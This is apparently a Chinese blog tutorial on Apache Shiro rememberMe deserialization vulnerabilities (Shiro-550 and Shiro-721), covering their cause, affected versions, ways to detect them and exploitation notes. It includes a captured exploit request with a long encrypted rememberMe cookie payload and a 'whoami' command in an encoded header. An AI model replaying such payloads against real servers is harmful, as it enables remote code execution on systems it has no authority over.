1.Shiro框架介绍
shiro反序列化详解(多个复现场景),看完就是赚到
Apache Shiro 是一个强大且灵活的安全框架,主要用于身份验证、授权、加密和会话管理。它可以帮助开发者轻松地实现用户权限控制,确保应用程序的安全性。
Apache Shiro反序列化漏洞分为两种:Shiro-550、Shiro-721
2.漏洞产生原理
- Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。
- **在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 **
- 那么,Payload产生的过程: 命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值
- 数据—–>序列化—–>aes加密——>base64——>存储再rememberMe中rememberMe——–>base64解码—->aes解密——>反序列化
- 在整个漏洞利用过程中,比较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很容易就知道密钥了,Payload构造起来也是十分的简单。
3.漏洞影响版本
Shiro-550: Apache Shiro < 1.2.4
Shiro-721: Apache Shiro = 1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1
4.漏洞挖掘思路
4.1.黑盒挖掘
由于Shiro是一个身份验证,授权加密的框架,所以常出现点就是在登录框,在登录的时候抓包,看Cookie字段是否存在RememberMe等字段,或使用burp的一些被动扫描插件判断是否使用了Shiro框架
当发现使用Shiro框架后,就可以使用一把梭工具进行测试是否存在Shiro漏洞
爆破密钥,检测利用链
1
2
3
4
5
6
7
8
9
10
|
GET / HTTP/1.1
Cookie: rememberMe=jFrHGFXD5Q5sM/yOgkydUbyDt73f4CBgu16niC9bwqnLyatxs3ZgGCg0TFA+8oGOpaOwNCqd36iVBsveR6MV48dtAOixjaaGO0hJMnW+robxDIHuuUU+fVIGadv5P/ZpQvpE9PpMyi4DFH6q7U+1wlFL29ixF7lMhJ2Y2gInrKKYCrYLX9mQZqjDMVK5AKKe/skhiKEiNnguQaNBVLp311/SgdNqmbsF5erYAKgdW4ZafFX7P0npigQ0O7DjugPc0O9lGl9Y6M2VdA9oFmmh6gFwoX6qYE7wsKr+qMXfti6zKjeWLJKca7d0acr+NPbBjIyY8LueihMPyO6H8hXZ+JrDMf92mxKYIIXKTClRqa5hi6294FVZ6Y1ziqkRSZ3/5yqjXYUk/ls3xUA0uKxs97M184zwRmPq+TTTn0rD6thkEIcMJA2mQ1m9rmQKVxAwoAc7OFIyfgU5CEC3MZd5IfI3IFVdg9YXtHhpy6dEX5QRI+OowQzgeLAYXduQdBymHa3RjR2IDO8l587bHNipkZ24OlVUp5TFpKT7AiYNUBUTbVbRV33452LIROi1/+dQoyZ/Phjr8Sbd/MV8VScFijOZ/IlPLNdjIOts1GSx8N5BPd1ZWe6PQL3L3haW4RMVvVRJu75eHcyRStsRV6WuE4yWWP6VErNzpVuRjuEUtZQU5O4/Fvgr+LEFORd4OHLggG+cvpGlIdxlZP4dbJKHj8edaV1Oz967EEH48ykHz5Yg/75I75SHP/PlXd62nkR4zZs/CIUQXYzH3IsopzMR1vDlrAqJHM4GdNXu96QHx1DPcO7knGn/CMHMetZ2VoV36W/hqE7687sMx9kAPtz5GqECnltUzY3OIJZ6pG6h6Tp325hfC6oAmaVGB/NgT2vGgvRPopBq4jat+kHKRqSCKsrvWLLJHvfvDDJM1n/KUhXLS/aaLTxiRv9/UJmwCyRnIFwMoTUq5TAkRlwgA/xQHVLnxmggb9HbiJA4NMDWvzfNprGFx31zeU4TEvnoHbdnSNj3lHKfUIfUcjN4LpLs2C7mUfHyPXZJpcJ7ubgnOaS/ReLIQohFQmhJtET5r5MAeSwgNUREb74yBnZlRweBKqG322zHGGKfZ7u7V0a+riGjUuk6RJcjdUgrlFAOWtfzeNJNgH60WRKG+CZReX0sRg1zREp5WTiwI1kjEQxLVPsVE32NiU+YiMsALk/x6NgcEssiqSZ3qqOlBLO0dxhyXNuL08IXuwnIsFwwpm75CUV9r4WiKIjOzW6LfwBxVpiaCMDhOQfK47m3lK7/sowuWDLtgIIqbGxGlE/3wbrmaRC7kGbXMlo1JNG+d1rd2Tio8BFZc0Eiww0jnxa56U95i2YCtC1fLcQCeKlDxPKt8Ve/PS0BmNvtTNRs9L6zu6P1jOpaY0S/4KqUrmIA64C57j7JnFqX1B4uwBtQFmc4/XqKyJ6rhngQs9a1pjSvG3bveU2eTeab32W4Q0f5yJKq47tk4nENJo5b6+GgTECTRVWnuXukM3sVZAWWYhfTG9xJk53UnxKEDZWyXFItsc6GpuynMyukBJ3hJLUZfb2ET4hFERQHfkG1/2HiORjlVy0a09qhSuGgc5NMg1E6JO/Vu3QQVG3HdG72Ma1X1EsaI3h0Zze4+ben28QUnl2YPdnPlJkbJJt5aErs5dtPKphvLLPuKobmIfLSGRa9ZfGnKUyTeJcfcA9Rq+tA9r0/vE0f+nbAu3rqQW20nRsuUSM70Xik01eVegqZtJhBbAK2J3QFPxo44kATTNj1LSJIhvOlX5BKGSlorPqV/59CYdE8/Kx1SN5axvFxlgO0TKoJSGpgEtzE+wCyn3uVNiLFflHAkE4fKuQxTVTCtX5Nw4SNuKvLobQyiaD75tt8VMWrpV6rv3/eER45If8tQ2jqNhyXXVyFXCIw5YBcVIaknTfIjtT3E2HJiu45Bu9vQ12/Qdu1JI8miRggcVvybn66LlZoi4qoWVBpdk4mb8GTTSPuo/bqPqFZ5xTV8aN4gKeXWWQHC5XZOeQRydSt+QlKYZD5j/zyjvoVimR1a1rIaYd/ndV1987reD3o6vvv6MedyH/Zyxa8G8XbMt0JQl3/KyxD6/o7ceZnP+wqi3f2Xy5qn+pRdZ1Bsd0F/nIkQIu9Yi2156oiOKFhMICoPurJyDMWNX3juiE3cn54Cq8N2eGNKdW7gGz5iUDkbRRx74XYY5O34saFxTgwfRy1TFnIMJG1UuET2t5eDSrNLvEPgeOfpg5gHk9Wr932/1ONFhCjHVfRrJ6wqsAlX+Vqpqy0q0SoSlBO6o3+nR0VKDyNPaLIuGlP6UNwsO2Yq24c5xUIZ3dEBffQEdM/Vw38B0lM99b1Q95cga3+CYRS6aGb4CrtIWWr4vzZ1UIssS5Pg8DVKngTyFyuhON5qGRjWvlNSy5NDgCJM2PoAldXo2hLOT/jS1hABVXECw/4dFUBmrT+pZg8WT5QelGTfguOnKe/sigeLMDFC1//cbLZdOFXdgAd/7bFmJmtg7X9D2wtwnCePeptjLtDfTcyZw6XjlBAAdrI6IwbnrEjmGZkKcKH7qymWiy1DSM43rz+alNY5iOihvimdqS4zrnbeGO0vJ01IlD7at39t+wqbQ3rXtTM3CG9diWSQLWTj07qaN49r45WyXQC8Irqn0iKbCbbqlkSYt0VmxMuOwQH4EEdyuLtnaj6YR0ia4Gvsb8/8Zs0GcwsgNtcYNLyx2OWnqzfERYJprWoX56m63aM3WZSE66fokUMx2o5v0n9lr7qsPfgoHsEoEwzfWCG5l7ft3YdGQESCyJoCEnXg/O5aBnM3vW7wjDOMI6frq5fqKQ6eNxfO6YuWL1fj+EMWP71XIQ1eX/5SqsEpHdX8PFp04tewhOulP7nvYjUKLhG5FKevq858JCwzkM4vkeSd3mGpUE5oPCrIzKKEsd3rJ+Ly8BPWH1VKIQtzwrS5P2iBX26Ced4tv9ryxl8WA/laDUCLVdcB5JnT1vggw0JqMg3WCnkxUzuMcttDrEqaI4KeSmlduF6bhjln5XfmX2KbxSY1Y6zNbsZY6DbFuh73cZNCvn7sl4coiPkRtgCKTzx6cywGbV36WW6R5WAGZRtCgOo5wUj2iBK34mO/4c5Gzv69yWviWONBFSvyA9ut7lodInJNWrqAzjZqZf1e8Zu09PxRG6qBMbmNoN/sTQ6IxHGT2zJE0Tjyh8YHEkzbVvG224gfNWR22x5rzuUX7qbAgC1C3b+sATUrn/7PthEtbkZEB7ZkzHk4FVUnvtZSGvwKTPKwAuw0nuWb7quNu7OtytQVjLnwhtd53xb00AKXTh1wu6AYklM4bBnUvQUW3MD8kGVsnzysdii9mnHnM9DnJVsURHNQjqbwDMFmlLm2xWcG1g26hkuR/BeN5WmZ60oiLi5BECWH1mkmFHPAQjxWxdhvLU0AbS1GkoZn/RNHlcI3AdKUwMD1s8hKyxTXXUOMk1iBQ/0NX6X8+a42BrtrVRgGo6vflFpx2VasBWs4D+GFn7m+piuhWDOC3FZO8Vev8Mvkr06FRUzi/4QlJDH82h7pDWAQtVg/BMFiYJBUZipw5NgiLGpEyNkiW63trO2ukR3UZw5fodufsHzqF24jTLaR6tVosXOrR7K8qcFOZ73SkXHUt7SWd25fzUYnGlhklIko0r2KWOMQtDQtV6rOLg3CcRI5jwzUFO023cJBp35wApX5FIiiVQta/yZ+y7G5xIsj51pTQrbdTr8GSLsjkHfGvS855nJUY7aNfFiE9Pv6bPar5+825cmdup/xeX9VGsYQGZf5Czt1pZjE9HmmNDbHgZaF8JKcZeUTPzDL7+UoraJ4lx9z+miSWoqtrU1cuLwdIw2ysbE4hQlXvy/7/JR7v0xaESMfps7VOkEoUDTBGMQ9bfDVFwTb+3IhUj3jAAa7qHSjUAwgXdWvYXp0DGt4IE/Kknh/aioueoUcdH+4nmPbG4ml/eJ8d59PlyEW6kLIarMVFLAp50Illrlo7I9xour2SQ8JkpDKrJoEAR/ydAMOSc6uuXzbhdi+hU6tj4sPw3jTgrpiUrQ4UsqBzNqyPZgg4niDGMufQuJanfoEizvChvgIM7V0NCVIWkCIBwJ+0P9oVM/JSodFi+3Pp3eme2tCG7Pa4Je5VqhXElz2GTcvx/nhL07ah2XsEeZyt287I1O+5nMtXGman1L0A+73Ex1DFsBnX7kegCPo5qxQN0Jt3Fud4pUsS6nBCfuQwwuXSuvUfRsJ2srz3dpi4sm8Ot7AtFfIn/abXGgXsziwd7SNndYKsCmo5U4el/6izct3GRtj2DsSWhQyV6JqJwKEUvzob8TJat9Um1ezTQ8twnGyL906fyEAybcNQvYFmL2ZW7ch3y2zk5XJ55srynkOP3PT++cFRshO36rQ//KvzXmgq0PxD52eJcizNCmEF6FnA/m3WvVfRWV+DuNdH92lor8ieyTjsudlgDCgu9irQQ6PK6mjxVSkUtfqHfpZ6ssebd8gmMQgNSzC8Sqd20MyjCkOvj5B2GKX4GO3eiZf0/4JKCba1q+PXav3ra7CMRTpG5a8/gOQ6jEloyAg6VV60NWu/HOApmuhbimqeQ9QLppuadjy3W44G0TjymWjcxwe8CR0n/aWlU/EiZZlYX/ZE4/Mtxi7qypmTOMStY+KfBA8ECKVlvmV5xFfQokVeuV9P8euAJWu941xCr9bg/qfVO0z7ZQz+zCiDkl5eLkt86AT7ZEBsk4peYvfaTtiQZCPf7wIBKgt+sAIsO7t16Mkn8AnAF+dHXbALh30/Vk03oe7Kr0QRPCdeRaKalMlIEZu96b8kZu8j8QfGH5DQrAIa9obvc7AwRLydcGYeg+TclbaYEWNXlsyP8lpmxEkiolYSUgg6sQV1Vk+OaccloIu2xguJWP3+wjL/oz0SlOLOahxiIVoihB+aXRJc2epDi5Zw9FAiyEfPZVolp8NRXwE32fCjxoNms+IxB+bjV4AvJwjatbeWX8gZvBo4QYvRgoBMuUqBPghxWm1thj+ajOAcEV+tr4cnNzmlGKgw0HN426d2XvmugqobM4mBK7f2ANS3A6y1dIhu60W6+5N/Gs3X1zn7TXT0YviTkUH6KdDUGJeVsXDimuddTE11hckQ0xUtI1ceBBoGsY1F8wGTmNsaF9dODxhkv9xxBGtXQAZo8tb+h9J308bGzbekWZ+jJwNOuXoLdXmaiqvWPBQHE7Ihu44NHrKmlqYZaE4BhSL65p2mFhRfRkpcjHbITzSIVKQD8YOJxyzQFF6EJfoy5KZfQClzQVRjDT
Authorization: Basic d2hvYW1p
Accept: text/html,application/json,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=12D77B15B8ABEE32B592B283EB1D46AA
Host: 192.168.165.252:8088
Connection: close
|
返回包内容为执行命令返回结果后base64加密的内容
4.2.白盒挖掘
查看项目的pom.xml或依赖是否使用Shiro框架
Shiro版本是否是存在漏洞的版本,查看Shiro的AES加密密钥
AES的密钥Key一般在项目的配置文件中,如果是默认的Key,那么项目的默认文件会找不到,而是在实现RememberMeManager的方法内,采用硬编码
5.Shiro反序列化利用
5.1.Shiro550
影响版本:Apache Shiro < 1.2.4
可以看到Shiro版本为1.2.4时,默认AES加密Key是硬编码在代码中的
注意:如果手动打的话,要删除掉数据包中的sessionId,如果数据包中存在SessionId,那么就不会读取RememberMe
5.2.Shiro721
Shiro-721: Apache Shiro = 1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1
但当Shiro版本为1.2.4以上时,AES加密Key采用随机生成的方式
因为shiro721用到的加密方式是AES-CBC,而且其中的ase加密的key基本猜不到了,是系统随机生成的。而cookie解析过程跟cookie的解析过程一样,也就意味着如果能伪造恶意的rememberMe字段的值且目标含有可利用的攻击链的话,还是能够进行RCE的。
使用工具进行爆破,发现爆破失败
Shiro721是使用 登录后rememberMe= {value}去爆破正确的key值 进而反序列化,shiro721 本质上是 padding attack,爆破要弄很久很久。对比Shiro550条件只要有 足够密钥库 (条件较低)、Shiro721需要登录(要求较高 )。
6.Shiro反序列化分析
shiro反序列化初入
反序列化学习之路-Shiro550
反序列化学习之路-Shiro-721 分析
